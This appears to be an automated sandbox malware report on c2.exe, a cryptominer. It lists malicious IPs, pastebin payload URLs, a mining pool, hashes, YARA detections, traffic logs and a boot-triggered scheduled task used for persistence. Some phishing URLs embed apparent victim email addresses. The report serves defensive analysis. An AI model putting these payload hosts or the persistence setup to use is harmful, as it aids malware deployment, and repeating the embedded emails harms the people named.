104.20.4.235 | cr_asm_crypter.ps1 | malicious | Unknown | pastebin.com/raw/sA04Mwk2
104.20.4.235 | sostener.vbs | malicious | Njrat | pastebin.com/raw/V9y5Q5vv
104.20.4.235 | sostener.vbs | malicious | XWorm | pastebin.com/raw/V9y5Q5vv
104.20.4.235 | envifa.vbs | malicious | Remcos | pastebin.com/raw/V9y5Q5vv
104.20.4.235 | New Voicemail Invoice 64746w .js | malicious | WSHRAT | pastebin.com/raw/NsQ5qTHr
51.79.145.144 | kYSSVJizBr.exe | malicious | Xmrig |
103.3.62.64 | file.exe | malicious | Xmrig |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
pastebin.com | Instruction_695-18112-002_Rev.PDF.lnk (2).d.lnk | malicious | Unknown | 172.67.19.24
pastebin.com | RdLfpZY5A9.exe | malicious | 77Rootkit, XWorm | 104.20.4.235
pastebin.com | file.exe | malicious | XWorm | 172.67.19.24
pastebin.com | main.exe | malicious | Unknown | 104.20.4.235
pastebin.com | CVmkXJ7e0a.exe | malicious | SheetRat | 104.20.4.235
pastebin.com | http://annavirgili.com | malicious | CAPTCHA Scam ClickFix | 172.67.19.24
pastebin.com | http://annavirgili.com | malicious | CAPTCHA Scam ClickFix | 172.67.19.24
pastebin.com | KrnlSetup.exe | malicious | XWorm | 104.20.3.235
pastebin.com | Revo.Uninstaller.Pro.v5.3.4.exe | malicious | Unknown | 104.20.3.235
pastebin.com | Revo.Uninstaller.Pro.v5.3.4.exe | malicious | Unknown | 104.20.4.235
xmr-asia1.nanopool.org | file.exe | malicious | Xmrig | 103.3.62.64
xmr-asia1.nanopool.org | Setup.exe | malicious | Xmrig | 172.104.165.191
xmr-asia1.nanopool.org | kYSSVJizBr.exe | malicious | Xmrig | 172.104.165.191
xmr-asia1.nanopool.org | file.exe | malicious | RedLine, Xmrig | 51.79.145.144
xmr-asia1.nanopool.org | file.exe | malicious | Xmrig | 139.99.102.74
xmr-asia1.nanopool.org | file.exe | malicious | Xmrig | 139.99.101.198
xmr-asia1.nanopool.org | file.exe | malicious | Xmrig | 103.3.62.64
xmr-asia1.nanopool.org | file.exe | malicious | Xmrig | 139.99.102.71
xmr-asia1.nanopool.org | file.exe | malicious | Xmrig | 139.99.102.70
xmr-asia1.nanopool.org | file.exe | malicious | Xmrig | 139.99.102.73
Match | Associated Sample Name / URL | Detection | Threat Name | Context
LINODE-APLinodeLLCUS | 236236236.elf | malicious | Unknown | 45.79.222.138
LINODE-APLinodeLLCUS | A6IuJ5NneS.lnk | malicious | LummaC | 139.162.173.118
LINODE-APLinodeLLCUS | https://feji.us/m266he | malicious | Unknown | 172.104.63.70
LINODE-APLinodeLLCUS | RFQ_P.O.1212024.scr | malicious | FormBook | 45.33.6.223
LINODE-APLinodeLLCUS | Outstanding Invoices Spreadsheet Scan 00495_PDF.exe | malicious | FormBook | 178.79.184.196
LINODE-APLinodeLLCUS | rebirth.spc.elf | malicious | Mirai, Okiru | 212.71.233.17
LINODE-APLinodeLLCUS | la.bot.arm6.elf | malicious | Mirai | 178.79.182.90
LINODE-APLinodeLLCUS | la.bot.mipsel.elf | malicious | Mirai | 50.116.24.57
LINODE-APLinodeLLCUS | BlOgLNwCom.exe | malicious | XenoRAT | 96.126.118.61
LINODE-APLinodeLLCUS | i586.elf | malicious | Unknown | 172.104.31.172
CLOUDFLARENETUS | 23d5f89e-2c54-ee19-3778-06a4bec842b9.eml | malicious | Unknown | 104.18.65.57
CLOUDFLARENETUS | https://protect.checkpoint.com/v2/r01/___https://link.edgepilot.com/xdg*~*fiaa57dVgx2DluRTp19jF8WMmYfWl?z=myyux:ddjrfnq.ynintwjuqD.htrdhdjOBhER6ylHFZFTGu9JoBlVNMIw79G-bMOgKn5Sf55EkuFm_s/LOKQ2pPEoswuEsuU2A7WKVctU0F0LxRir4fJPhZrPOzTgvHZltxJFSX/jFwCJW7F4BtO0gjUt6gM8NiU9g*~*uEaD_oE2wiDMlq2GDu8zhwYySQbzr0kVZGcn8s4Dk7cEDvSl6XRkaXaP7a5RqmSqgUx7-yk6g8/s-FxFFU__PNlcuV___.YzJ1OndhaXRha2VyZXByaW1hcnk6YzpvOmRkMGI4MjA2MTNmMjg1YzMyNTM2YjE2YzI0MjAzMGU1Ojc6MzQ1NjphZDU1ODAwMDRlN2FjYWY0Nzk3ODJmN2U3MjI1MmNkMTUyZWIyNWZlZjgyYTY4N2M3ZWVjN2E0NjVmZjU3M2E4Omg6VDpU | malicious | Unknown | 104.16.123.96
CLOUDFLARENETUS | file.exe | malicious | LummaC, Amadey, Cryptbot, LummaC Stealer, RHADAMANTHYS, Xmrig | 172.67.129.27
CLOUDFLARENETUS | 122046760.bat | malicious | RHADAMANTHYS | 162.159.61.3
CLOUDFLARENETUS | pkqLAMAv96.lnk | malicious | RHADAMANTHYS | 172.64.41.3
CLOUDFLARENETUS | IIC0XbKFjS.lnk | malicious | RHADAMANTHYS | 172.64.41.3
CLOUDFLARENETUS | 873406390.bat | malicious | RHADAMANTHYS | 172.64.41.3
CLOUDFLARENETUS | 0J3fAc6cHO.lnk | malicious | RHADAMANTHYS | 162.159.61.3
CLOUDFLARENETUS | https://atc-secure.com/nocod/wetransdnyd.html#k.muench@muenchundmuench.com | malicious | Unknown | 104.17.25.14
CLOUDFLARENETUS | https://www.google.com/amp/s/wellsecure.es/.secure##email## | malicious | Unknown | 172.67.166.39
OVHFR | Clienter.dll.dll | malicious | Unknown | 51.77.90.246
OVHFR | uEhN67huiV.dll | malicious | Unknown | 54.36.205.38
OVHFR | https://alluc.co/watch-movies/passengers.html | malicious | Unknown | 54.38.113.6
OVHFR | Clienter.dll.dll | malicious | Unknown | 94.23.76.52
OVHFR | https://quarantine-emails13122024bcpe038qua8303rantine0832411.s3.eu-central-3.ionoscloud.com/message.html#anneke.hanekom@mmiholdings.co.za | malicious | HTMLPhisher | 46.105.222.162
OVHFR | 1.elf | malicious | Unknown | 51.77.132.207
OVHFR | 236236236.elf | malicious | Unknown | 198.50.252.64
OVHFR | sh4.elf | malicious | Mirai | 51.38.60.221
OVHFR | ppc.elf | malicious | Mirai | 176.31.173.203
OVHFR | i686.elf | malicious | Mirai | 51.91.63.124
                                              No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
C:\Windows\Temp\ppefirylicdf.sys | ldr.ps1 | malicious | GO Miner, Xmrig |
C:\Windows\Temp\ppefirylicdf.sys | ZppxPm0ASs.exe | malicious | Xmrig |
C:\Windows\Temp\ppefirylicdf.sys | file.exe | malicious | Amadey, LummaC Stealer, Vidar, Xmrig |
C:\Windows\Temp\ppefirylicdf.sys | feZvV3DCj8.exe | malicious | Xmrig |
C:\Windows\Temp\ppefirylicdf.sys | services64.exe | malicious | Xmrig |
C:\Windows\Temp\ppefirylicdf.sys | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig |
C:\Windows\Temp\ppefirylicdf.sys | file.exe | malicious | Xmrig |
C:\Windows\Temp\ppefirylicdf.sys | file.exe | malicious | Amadey, LummaC Stealer, Stealc, Vidar, Xmrig |
C:\Windows\Temp\ppefirylicdf.sys | file.exe | malicious | Xmrig |
C:\Windows\Temp\ppefirylicdf.sys | 5EZLEXDveC.exe | malicious | LummaC, Amadey, LummaC Stealer, Stealc, Vidar |
C:\Windows\Temp\lnobvhjdatqu.tmp | file.exe | malicious | Xmrig |
                                                                    Process:C:\Users\user\Desktop\c2.exe
                                                                    File Type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):5737472
                                                                    Entropy (8bit):7.67011402410826
                                                                    Encrypted:false
                                                                    SSDEEP:98304:Tr+uGthg9APk/gpZ49dTpFj8MxJckGsab4PkNU/ZsGpSGvJXkt:TihtO9A8sybTFjGGPjsMSGvJUt
                                                                    MD5:EB0588E6420A0A2FB8B262554091ADD3
                                                                    SHA1:5C2BDD9050A44B7AFD028E9BE44142DA93232A37
                                                                    SHA-256:6CB04057A0313BC34459ABA72170F4039148AAACE0B396B6C881B92769199853
                                                                    SHA-512:8278FA6A29258F4095200540D003F33EDE8AC7D8267FCAA14872FDAD674205057FE728754F53AC43FE2F4DCD36FBE223F6D52C9D71AE4F7CA98C2921AEC710AF
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    • Antivirus: ReversingLabs, Detection: 42%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d......................(.F....W................@............................. X.......X...`... ...............................................W.......X.......W.p.............X..............................}W.(.....................W.P............................text...xE.......F..................`..`.data...@.W..`....W..J..............@....rdata.......pW......XW.............@..@.pdata..p.....W......pW.............@..@.xdata........W......vW.............@..@.bss..........W..........................idata........W......|W.............@....CRT....`.....W.......W.............@....tls..........W.......W.............@....rsrc.........X.......W.............@....reloc........X.......W.............@..B........................................................................................................................................................................
                                                                    Process:C:\Users\user\Desktop\c2.exe
                                                                    File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):1490
                                                                    Entropy (8bit):5.1015990235428035
                                                                    Encrypted:false
                                                                    SSDEEP:24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
                                                                    MD5:546D67A48FF2BF7682CEA9FAC07B942E
                                                                    SHA1:A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
                                                                    SHA-256:EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
                                                                    SHA-512:10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
                                                                    Malicious:false
                                                                    Preview:<?xml version="1.0" encoding="UTF-16"?>..<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">.. <Triggers>.. <BootTrigger>.. . <Enabled>true</Enabled>.. </BootTrigger>.. </Triggers>.. <Principals>.. <Principal id="Author">... <RunLevel>HighestAvailable</RunLevel>.. </Principal>.. </Principals>.. <Settings>.. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>.. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>.. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>.. <AllowHardTerminate>false</AllowHardTerminate>.. <StartWhenAvailable>false</StartWhenAvailable>.. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>.. <IdleSettings>.. <Duration>PT10M</Duration>.. <WaitTimeout>PT1H</WaitTimeout>.. <StopOnIdleEnd>false</StopOnIdleEnd>.. <RestartOnIdle>false</RestartOnIdle>.. </IdleSettings>.. <AllowStartOnDemand>true</AllowStartOnDemand>.. <Enabled>true</Enabl
Process: C:\Program Files\Google\Chrome\updater.exe
File Type: PE32+ executable (GUI) x86-64, for MS Windows
Category: dropped
Size (bytes): 5651456
Entropy (8bit): 6.686504811317419
Encrypted: false
SSDEEP: 98304:arBrt3+RH2GEo/L7pdenlL17ouknW3jZAk3cB0vyRfgIlFQSmf1JjGGI0:aj3+RZyjZn3c5RYIlGLfjGGI
MD5: 71BA2926F4F302EA7524510B7A07CD28
SHA1: A9AE469CE440353F66FF604EDE55528F95D3F6BA
SHA-256: 3D0E5AED0AFC5A7719AF93C49C55E6CE91ADFFE5CC50D1597ABB1CCED05FFAA3
SHA-512: 3F6580D75D177222719A79E9AA79F6361D545AE5E3135D77D7C0C96C97C87A02E92F3EFEC8C21F0D4AB643DE8F8E261C0026C5015A00B0785A9FAC55CF187089
Malicious: true
Yara Hits:
• Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: C:\Windows\Temp\lnobvhjdatqu.tmp, Author: Joe Security
• Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: C:\Windows\Temp\lnobvhjdatqu.tmp, Author: unknown
• Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: C:\Windows\Temp\lnobvhjdatqu.tmp, Author: Florian Roth
• Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: C:\Windows\Temp\lnobvhjdatqu.tmp, Author: ditekSHen
Antivirus:
• Antivirus: Joe Sandbox ML, Detection: 100%
• Antivirus: ReversingLabs, Detection: 62%
Joe Sandbox View:
• Filename: file.exe, Detection: malicious
Process: C:\Program Files\Google\Chrome\updater.exe
File Type: PE32+ executable (native) x86-64, for MS Windows
Category: dropped
Size (bytes): 14544
Entropy (8bit): 6.2660301556221185
Encrypted: false
SSDEEP: 192:nqjKhp+GQvzj3i+5T9oGYJh1wAoxhSF6OOoe068jSJUbueq1H2PIP0:qjKL+v/y+5TWGYOf2OJ06dUb+pQ
MD5: 0C0195C48B6B8582FA6F6373032118DA
SHA1: D25340AE8E92A6D29F599FEF426A2BC1B5217299
SHA-256: 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
SHA-512: AB28E99659F219FEC553155A0810DE90F0C5B07DC9B66BDA86D7686499FB0EC5FDDEB7CD7A3C5B77DCCB5E865F2715C2D81F4D40DF4431C92AC7860C7E01720D
Malicious: true
Antivirus:
• Antivirus: ReversingLabs, Detection: 5%
Joe Sandbox View:
• Filename: ldr.ps1, Detection: malicious
• Filename: ZppxPm0ASs.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: feZvV3DCj8.exe, Detection: malicious
• Filename: services64.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: file.exe, Detection: malicious
• Filename: 5EZLEXDveC.exe, Detection: malicious
Process: C:\Program Files\Google\Chrome\updater.exe
File Type: XML 1.0 document, ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1490
Entropy (8bit): 5.1015990235428035
Encrypted: false
SSDEEP: 24:2dk4+SkIMFWYL60YeGlMhEMjn5pwjpILUYODOLqx49RJh7h8gJ15E15LNEB86tn:cC3IQDL60uydbQ9IIYODOLqOdq2sbEx
MD5: 546D67A48FF2BF7682CEA9FAC07B942E
SHA1: A2CB3A9A97FD935B5E62D4C29B3E2C5AB7D5FC90
SHA-256: EFF7EDC19E6C430AAECA7EA8A77251C74D1E9ABB79B183A9EE1F58C2934B4B6A
SHA-512: 10D90EDF31C0955BCEC52219D854952FD38768BD97E8E50D32A1237BCCAF1A5EB9F824DA0F81A7812E0CE62C0464168DD0201D1C0EB61B9FE253FE7C89DE05FE
Malicious: false
Preview (truncated):
<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.3" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <BootTrigger>
      <Enabled>true</Enabled>
    </BootTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
    <AllowHardTerminate>false</AllowHardTerminate>
    <StartWhenAvailable>false</StartWhenAvailable>
    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
    <IdleSettings>
      <Duration>PT10M</Duration>
      <WaitTimeout>PT1H</WaitTimeout>
      <StopOnIdleEnd>false</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
    <AllowStartOnDemand>true</AllowStartOnDemand>
    <Enabled>true</Enabl
File type: PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit): 7.67011402410826
TrID:
• Win64 Executable (generic) (12005/4) 74.95%
• Generic Win/DOS Executable (2004/3) 12.51%
• DOS Executable Generic (2002/1) 12.50%
• Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name: c2.exe
File size: 5'737'472 bytes
MD5: eb0588e6420a0a2fb8b262554091add3
SHA1: 5c2bdd9050a44b7afd028e9be44142da93232a37
SHA256: 6cb04057a0313bc34459aba72170f4039148aaace0b396b6c881b92769199853
SHA512: 8278fa6a29258f4095200540d003f33ede8ac7d8267fcaa14872fdad674205057fe728754f53ac43fe2f4dcd36fbe223f6d52c9d71ae4f7ca98c2921aec710af
SSDEEP: 98304:Tr+uGthg9APk/gpZ49dTpFj8MxJckGsab4PkNU/ZsGpSGvJXkt:TihtO9A8sybTFjGGPjsMSGvJUt
TLSH: 1946C0D4BFDEFB45CE708630CD0BAC06B7DA64259E8D436632A5D60D42376B3D92A8C1
Icon Hash: 90cececece8e8eb0
Entrypoint: 0x1400012fd
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x140000000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, DEBUG_STRIPPED
DLL Characteristics: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x0 [Thu Jan 1 00:00:00 1970 UTC]
TLS Callbacks: 0x4000329c, 0x1, 0x40003280, 0x1
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: 84364258335aa120aa66630a9ee645bf
Instruction
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [00576E68h]
mov dword ptr [eax], 00000001h
call 00007F41392A5D73h
nop
nop
dec eax
add esp, 28h
ret
dec eax
sub esp, 28h
dec eax
mov eax, dword ptr [00576E4Bh]
xor edx, edx
mov dword ptr [eax], edx
call 00007F41392A5D58h
nop
nop
dec eax
add esp, 28h
ret
dec eax
sub esp, 28h
call 00007F41392A8AF7h
dec eax
cmp eax, 01h
sbb eax, eax
dec eax
add esp, 28h
ret
nop
nop
nop
nop
nop
nop
nop
dec eax
lea ecx, dword ptr [00000005h]
jmp 00007F41392A5F2Eh
ret
nop
nop
nop
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
ret
inc ecx
push edi
inc ecx
push esi
inc ecx
push ebp
inc ecx
push esp
push ebp
push edi
push esi
push ebx
dec eax
sub esp, 48h
dec esp
mov esp, dword ptr [esp+000000B0h]
dec esp
mov ebp, dword ptr [esp+000000B8h]
dec esp
mov edi, dword ptr [esp+000000C0h]
dec esp
mov esi, dword ptr [esp+000000C8h]
dec eax
mov edi, ecx
dec eax
mov ecx, edx
dec esp
mov ebx, eax
dec esp
mov esi, ecx
call 00007F41392A66E3h
test al, al
jne 00007F41392A5FA2h
mov edx, esi
dec eax
Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x57d000         0x5c4         .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x580000         0x388         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x579000         0x570         .pdata
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x581000         0x84          .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x577de0         0x28          .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x57d190         0x150         .idata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x0              0x0
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0
Name    Virtual Address  Virtual Size  Raw Size  MD5                               Xored PE  ZLIB Complexity     File Type  Entropy              Characteristics
.text   0x1000           0x4578        0x4600    086ffce09aff7cb44263d553168e79b3  False     0.5748883928571429  data       6.2554154553510095   IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data   0x6000           0x570d40      0x570e00  8a244fbb8bb1fbd62a7de109eec86f2c  unknown   unknown             unknown    unknown              IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata  0x577000         0x1680        0x1800    9fd4b1493639d12320f01a4d0ceae058  False     0.4041341145833333  data       4.3282044619111035   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.pdata  0x579000         0x570         0x600     0bd7b3130bda8394c01cd314503e9808  False     0.4134114583333333  data       4.180517159286159    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.xdata  0x57a000         0x40c         0x600     6e2711e41b7236fa17485c99552f04a1  False     0.251953125         data       3.0246054589923945   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.bss    0x57b000         0x12a0        0x0       d41d8cd98f00b204e9800998ecf8427e  False     0                   empty      0.0                  IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata  0x57d000         0x5c4         0x600     e64225ab0f6687883e87af34cba5ade2  False     0.361328125         data       4.041229808304254    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT    0x57e000         0x60          0x200     e945d9040c7a97702c9db9ea618741bb  False     0.06640625          data       0.27950974526108024  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls    0x57f000         0x10          0x200     bf619eac0cdf3f68d496ea9344137e8b  False     0.02734375          data       0.0                  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc   0x580000         0x388         0x400     e5e982a2259c1b0a2a215d8781c7f919  False     0.4482421875        data       5.013099963507475    IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.reloc  0x581000         0x84          0x200     58d17e13e89481fbae05163e12d57bcd  False     0.25390625          data       1.5215036536150712   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name         RVA       Size   Type                          Language  Country        ZLIB Complexity
RT_MANIFEST  0x580058  0x330  XML 1.0 document, ASCII text  English   United States  0.508578431372549
DLL           Import
KERNEL32.dll  DeleteCriticalSection, EnterCriticalSection, GetLastError, InitializeCriticalSection, LeaveCriticalSection, SetUnhandledExceptionFilter, Sleep, TlsGetValue, VirtualProtect, VirtualQuery
msvcrt.dll    __C_specific_handler, __getmainargs, __initenv, __iob_func, __set_app_type, __setusermatherr, _amsg_exit, _cexit, _commode, _fmode, _initterm, _onexit, abort, calloc, exit, fprintf, fputs, free, malloc, signal, strlen, strncmp, vfprintf, wcscat, wcscpy, wcslen, wcsncmp, wcsstr, _wcsnicmp, _wcsicmp
Language of compilation system  Country where language is spoken
English                         United States
Timestamp                        SID      Signature                                          Severity  Source IP     Source Port  Dest IP      Dest Port  Protocol
2024-12-17T12:46:06.900142+0100  2054247  ET MALWARE SilentCryptoMiner Agent Config Inbound  1         104.20.4.235  443          192.168.2.4  49731      TCP
Timestamp  Source Port  Dest Port  Source IP  Dest IP
                                                                    Dec 17, 2024 12:46:08.728266954 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:09.169125080 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:09.219769001 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:46:09.404848099 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:09.454164028 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:46:09.596832991 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:09.641577005 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:46:15.963438034 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:16.016617060 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:46:26.055392981 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:26.204174042 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:46:35.062146902 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:35.110522032 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:46:45.029025078 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:45.110986948 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:46:55.030191898 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:46:55.219835997 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:47:00.019067049 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:47:00.065308094 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:47:10.022248030 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:47:10.126123905 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:47:20.037029028 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:47:20.126162052 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:47:30.093190908 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:47:30.219966888 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:47:40.047580957 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:47:40.126192093 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:47:50.059048891 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:47:50.220005989 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:48:00.067523003 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:48:00.219976902 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:48:10.059845924 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:48:10.110650063 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:48:20.070759058 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:48:20.126296997 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:48:30.077368021 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:48:30.126296997 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:48:42.082745075 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:48:42.126318932 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:48:52.074160099 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:48:52.126363993 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:49:02.104476929 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:49:02.262633085 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:49:12.072252035 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:49:12.126388073 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:49:22.051728010 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:49:22.180736065 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:49:29.001411915 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:49:29.126434088 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:49:39.026396036 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:49:39.126473904 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:49:48.999936104 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:49:49.126492977 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:49:59.033806086 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:49:59.126604080 CET4973210343192.168.2.451.79.145.144
                                                                    Dec 17, 2024 12:50:09.037151098 CET103434973251.79.145.144192.168.2.4
                                                                    Dec 17, 2024 12:50:09.083920002 CET4973210343192.168.2.451.79.145.144
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 17, 2024 12:46:03.845988989 CET | 64161 | 53 | 192.168.2.4 | 1.1.1.1
Dec 17, 2024 12:46:03.991067886 CET | 53 | 64161 | 1.1.1.1 | 192.168.2.4
Dec 17, 2024 12:46:04.946609974 CET | 60214 | 53 | 192.168.2.4 | 1.1.1.1
Dec 17, 2024 12:46:05.084379911 CET | 53 | 60214 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
